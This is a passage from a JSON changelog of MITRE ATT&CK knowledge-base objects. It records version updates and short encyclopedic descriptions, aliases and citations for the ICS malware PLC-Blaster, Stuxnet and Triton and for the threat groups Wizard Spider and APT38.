                    "x_mitre_contributors": [
                        "Joe Slowik - Dragos"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 22:21:12.036000+00:00\", \"old_value\": \"2023-10-17 20:05:34.648000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "malware",
                    "id": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-03-26 15:02:14.907000+00:00",
                    "modified": "2026-04-23 14:17:13.861000+00:00",
                    "name": "PLC-Blaster",
                    "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) is a piece of proof-of-concept malware that runs on Siemens S7 PLCs. This worm locates other Siemens S7 PLCs on the network and attempts to infect them.  Once this worm has infected its target and attempted to infect other devices on the network, the worm can then run one of many modules. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016) (Citation: Spenneberg, Ralf 2016) ",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S1006",
                            "external_id": "S1006"
                        },
                        {
                            "source_name": "Spenneberg, Ralf 2016",
                            "description": "Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 2019/06/06 ",
                            "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf"
                        },
                        {
                            "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016",
                            "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ",
                            "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "PLC-Blaster"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 14:17:13.861000+00:00\", \"old_value\": \"2025-04-16 21:26:24.423000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "malware",
                    "id": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-12-14 17:34:58.457000+00:00",
                    "modified": "2026-04-24 02:36:25.135000+00:00",
                    "name": "Stuxnet",
                    "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex malware that utilized multiple behaviors, including numerous zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) ",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0603",
                            "external_id": "S0603"
                        },
                        {
                            "source_name": "W32.Stuxnet",
                            "description": "(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) "
                        },
                        {
                            "source_name": "CISA ICS Advisory ICSA-10-272-01",
                            "description": "CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.",
                            "url": "https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01"
                        },
                        {
                            "source_name": "ESET Stuxnet Under the Microscope",
                            "description": "Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.",
                            "url": "https://web-assets.esetstatic.com/wls/2012/11/Stuxnet_Under_the_Microscope.pdf"
                        },
                        {
                            "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011",
                            "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024.",
                            "url": "https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en"
                        },
                        {
                            "source_name": "Langer Stuxnet",
                            "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.",
                            "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Stuxnet",
                        "W32.Stuxnet"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.5",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 02:36:25.135000+00:00\", \"old_value\": \"2025-01-02 19:40:26.678000+00:00\"}, \"root['description']\": {\"new_value\": \"[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex malware that utilized multiple behaviors, including numerous zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) \", \"old_value\": \"[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) \"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.5\", \"old_value\": \"1.4\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 1.5",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to212__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to212__0\"><a href=\"#difflib_chg_to212__top\">t</a></td><td class=\"diff_header\" id=\"from212_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">[Stuxnet](https://attack.mitre.org/software/S0603)&nbsp;was&nbsp;the&nbsp;f</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to212__top\">t</a></td><td class=\"diff_header\" id=\"to212_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">[Stuxnet](https://attack.mitre.org/software/S0603)&nbsp;was&nbsp;the&nbsp;f</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">irst&nbsp;publicly&nbsp;reported&nbsp;piece&nbsp;of&nbsp;malware&nbsp;to&nbsp;specifically&nbsp;targ</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">irst&nbsp;publicly&nbsp;reported&nbsp;malware&nbsp;to&nbsp;specifically&nbsp;target&nbsp;indust</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">et&nbsp;industrial&nbsp;control&nbsp;systems&nbsp;devices.&nbsp;[Stuxnet](https://att</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rial&nbsp;control&nbsp;systems&nbsp;devices.&nbsp;[Stuxnet](https://attack.mitre</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ack.mitre.org/software/S0603)&nbsp;is&nbsp;a&nbsp;large&nbsp;and&nbsp;complex&nbsp;piece&nbsp;o</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">.org/software/S0603)&nbsp;is&nbsp;a&nbsp;large&nbsp;and&nbsp;complex&nbsp;malware&nbsp;that&nbsp;uti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">f&nbsp;malware&nbsp;that&nbsp;utilized&nbsp;multiple&nbsp;different&nbsp;behaviors&nbsp;includi</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">lized&nbsp;multiple&nbsp;behaviors,&nbsp;including&nbsp;numerous&nbsp;zero-day&nbsp;vulner</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ng&nbsp;multiple&nbsp;zero-day&nbsp;vulnerabilities,&nbsp;a&nbsp;sophisticated&nbsp;Window</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">abilities,&nbsp;a&nbsp;sophisticated&nbsp;Windows&nbsp;rootkit,&nbsp;and&nbsp;network&nbsp;infe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;rootkit,&nbsp;and&nbsp;network&nbsp;infection&nbsp;routines.(Citation:&nbsp;Nicolas</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ction&nbsp;routines.(Citation:&nbsp;Nicolas&nbsp;Falliere,&nbsp;Liam&nbsp;O&nbsp;Murchu,&nbsp;E</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;Falliere,&nbsp;Liam&nbsp;O&nbsp;Murchu,&nbsp;Eric&nbsp;Chien&nbsp;February&nbsp;2011)(Citation</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ric&nbsp;Chien&nbsp;February&nbsp;2011)(Citation:&nbsp;CISA&nbsp;ICS&nbsp;Advisory&nbsp;ICSA-10</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">:&nbsp;CISA&nbsp;ICS&nbsp;Advisory&nbsp;ICSA-10-272-01)(Citation:&nbsp;ESET&nbsp;Stuxnet&nbsp;U</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">-272-01)(Citation:&nbsp;ESET&nbsp;Stuxnet&nbsp;Under&nbsp;the&nbsp;Microscope)(Citati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nder&nbsp;the&nbsp;Microscope)(Citation:&nbsp;Langer&nbsp;Stuxnet)&nbsp;[Stuxnet](htt</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on:&nbsp;Langer&nbsp;Stuxnet)&nbsp;[Stuxnet](https://attack.mitre.org/softw</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ps://attack.mitre.org/software/S0603)&nbsp;was&nbsp;discovered&nbsp;in&nbsp;2010</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">are/S0603)&nbsp;was&nbsp;discovered&nbsp;in&nbsp;2010,&nbsp;with&nbsp;some&nbsp;components&nbsp;bein</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">,&nbsp;with&nbsp;some&nbsp;components&nbsp;being&nbsp;used&nbsp;as&nbsp;early&nbsp;as&nbsp;November&nbsp;2008.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">g&nbsp;used&nbsp;as&nbsp;early&nbsp;as&nbsp;November&nbsp;2008.(Citation:&nbsp;Nicolas&nbsp;Falliere</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">(Citation:&nbsp;Nicolas&nbsp;Falliere,&nbsp;Liam&nbsp;O&nbsp;Murchu,&nbsp;Eric&nbsp;Chien&nbsp;Febru</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;Liam&nbsp;O&nbsp;Murchu,&nbsp;Eric&nbsp;Chien&nbsp;February&nbsp;2011)&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ary&nbsp;2011)&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "malware",
                    "id": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-03-26 15:02:14.907000+00:00",
                    "modified": "2026-04-22 20:06:22.741000+00:00",
                    "name": "Triton",
                    "description": "[Triton](https://attack.mitre.org/software/S1009) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers.(Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017)(Citation: Dragos December 2017)(Citation: DHS CISA February 2019)(Citation: Schneider Electric January 2018)(Citation: Julian Gutmanis March 2019)(Citation: Schneider December 2018)(Citation: Jos Wetzels January 2018)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S1009",
                            "external_id": "S1009"
                        },
                        {
                            "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017",
                            "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ",
                            "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html"
                        },
                        {
                            "source_name": "DHS CISA February 2019",
                            "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ",
                            "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf"
                        },
                        {
                            "source_name": "Dragos December 2017",
                            "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ",
                            "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf"
                        },
                        {
                            "source_name": "Jos Wetzels January 2018",
                            "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ",
                            "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware"
                        },
                        {
                            "source_name": "Julian Gutmanis March 2019",
                            "description": "Julian Gutmanis 2019, March 11 Triton - A Report From The Trenches Retrieved. 2019/03/11 ",
                            "url": "https://www.youtube.com/watch?v=XwSJ8hloGvY"
                        },
                        {
                            "source_name": "Schneider December 2018",
                            "description": "Schneider 2018, December 14 Security Notification  EcoStruxure Triconex Tricon V3 Retrieved. 2019/03/08 ",
                            "url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet&p_File_Name=SEVD-2017-347-01+Triconex+V3.pdf&p_Doc_Ref=SEVD-2017-347-01"
                        },
                        {
                            "source_name": "Schneider Electric January 2018",
                            "description": "Schneider Electric 2018, January 23 TRITON - Schneider Electric Analysis and Disclosure Retrieved. 2019/03/14 ",
                            "url": "https://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0s"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Triton",
                        "TRISIS",
                        "HatMan"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 20:06:22.741000+00:00\", \"old_value\": \"2024-04-17 16:12:43.754000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 1.2"
                }
            ],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "groups": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-12 18:15:29.396000+00:00",
                    "modified": "2026-01-20 16:26:04.859000+00:00",
                    "name": "Wizard Spider",
                    "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)",
                    "aliases": [
                        "Wizard Spider",
                        "UNC1878",
                        "TEMP.MixMaster",
                        "Grim Spider",
                        "FIN12",
                        "GOLD BLACKBURN",
                        "ITG23",
                        "Periwinkle Tempest",
                        "DEV-0193",
                        "Pistachio Tempest",
                        "DEV-0237"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0102",
                            "external_id": "G0102"
                        },
                        {
                            "source_name": "Grim Spider",
                            "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)"
                        },
                        {
                            "source_name": "UNC1878",
                            "description": "(Citation: FireEye KEGTAP SINGLEMALT October 2020)"
                        },
                        {
                            "source_name": "TEMP.MixMaster",
                            "description": "(Citation: FireEye Ryuk and Trickbot January 2019)"
                        },
                        {
                            "source_name": "ITG23",
                            "description": "(Citation: IBM X-Force ITG23 Oct 2021)"
                        },
                        {
                            "source_name": "FIN12",
                            "description": "(Citation: Mandiant FIN12 Oct 2021)"
                        },
                        {
                            "source_name": "Periwinkle Tempest",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "DEV-0193",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "Pistachio Tempest",
                            "description": "(Citation: Microsoft_PistachioTempest_Jan2024)"
                        },
                        {
                            "source_name": "DEV-0237",
                            "description": "(Citation: Microsoft_PistachioTempest_Jan2024)"
                        },
                        {
                            "source_name": "GOLD BLACKBURN",
                            "description": "(Citation: Secureworks Gold Blackburn Mar 2022)"
                        },
                        {
                            "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020",
                            "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.",
                            "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a"
                        },
                        {
                            "source_name": "FireEye Ryuk and Trickbot January 2019",
                            "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.",
                            "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html"
                        },
                        {
                            "source_name": "CrowdStrike Ryuk January 2019",
                            "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.",
                            "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/"
                        },
                        {
                            "source_name": "CrowdStrike Grim Spider May 2019",
                            "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.",
                            "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/"
                        },
                        {
                            "source_name": "FireEye KEGTAP SINGLEMALT October 2020",
                            "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.",
                            "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "Microsoft_PistachioTempest_Jan2024",
                            "description": "Microsoft. (2024, January 25). Financially Motivated Threat Actor Pistachio Tempest. Retrieved December 15, 2025.",
                            "url": "https://www.microsoft.com/en-us/security/security-insider/threat-landscape/pistachio-tempest"
                        },
                        {
                            "source_name": "CrowdStrike Wizard Spider October 2020",
                            "description": "Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.",
                            "url": "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/"
                        },
                        {
                            "source_name": "Secureworks Gold Blackburn Mar 2022",
                            "description": "Secureworks Counter Threat Unit. (2022, March 1). Gold Blackburn Threat Profile. Retrieved June 15, 2023.",
                            "url": "https://www.secureworks.com/research/threat-profiles/gold-blackburn"
                        },
                        {
                            "source_name": "Mandiant FIN12 Oct 2021",
                            "description": "Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.",
                            "url": "https://web.archive.org/web/20220313061955/https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf"
                        },
                        {
                            "source_name": "IBM X-Force ITG23 Oct 2021",
                            "description": "Villadsen, O., et al. (2021, October 13). Trickbot Rising - Gang Doubles Down on Infection Efforts to Amass Network Footholds. Retrieved June 15, 2023.",
                            "url": "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Edward Millington",
                        "Oleksiy Gayda"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "4.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-20 16:26:04.859000+00:00\", \"old_value\": \"2025-03-12 20:33:21.597000+00:00\"}, \"root['external_references'][17]['url']\": {\"new_value\": \"https://web.archive.org/web/20220313061955/https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf\", \"old_value\": \"https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf\", \"new_path\": \"root['external_references'][20]['url']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"4.1\", \"old_value\": \"4.0\"}}, \"iterable_item_added\": {\"root['aliases'][9]\": \"Pistachio Tempest\", \"root['aliases'][10]\": \"DEV-0237\", \"root['external_references'][8]\": {\"source_name\": \"Pistachio Tempest\", \"description\": \"(Citation: Microsoft_PistachioTempest_Jan2024)\"}, \"root['external_references'][9]\": {\"source_name\": \"DEV-0237\", \"description\": \"(Citation: Microsoft_PistachioTempest_Jan2024)\"}, \"root['external_references'][17]\": {\"source_name\": \"Microsoft_PistachioTempest_Jan2024\", \"description\": \"Microsoft. (2024, January 25). Financially Motivated Threat Actor Pistachio Tempest. Retrieved December 15, 2025.\", \"url\": \"https://www.microsoft.com/en-us/security/security-insider/threat-landscape/pistachio-tempest\"}}}",
                    "previous_version": "4.0",
                    "version_change": "4.0 \u2192 4.1"
                }
            ],
            "other_version_changes": [],
            "patches": [
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-01-29 21:27:24.793000+00:00",
                    "modified": "2025-11-13 19:21:05.133000+00:00",
                    "name": "APT38",
                    "description": "[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (Citation: FireEye APT38 Oct 2018) and Banco de Chile (Citation: FireEye APT38 Oct 2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.",
                    "aliases": [
                        "APT38",
                        "NICKEL GLADSTONE",
                        "BeagleBoyz",
                        "Bluenoroff",
                        "Stardust Chollima",
                        "Sapphire Sleet",
                        "COPERNICIUM"
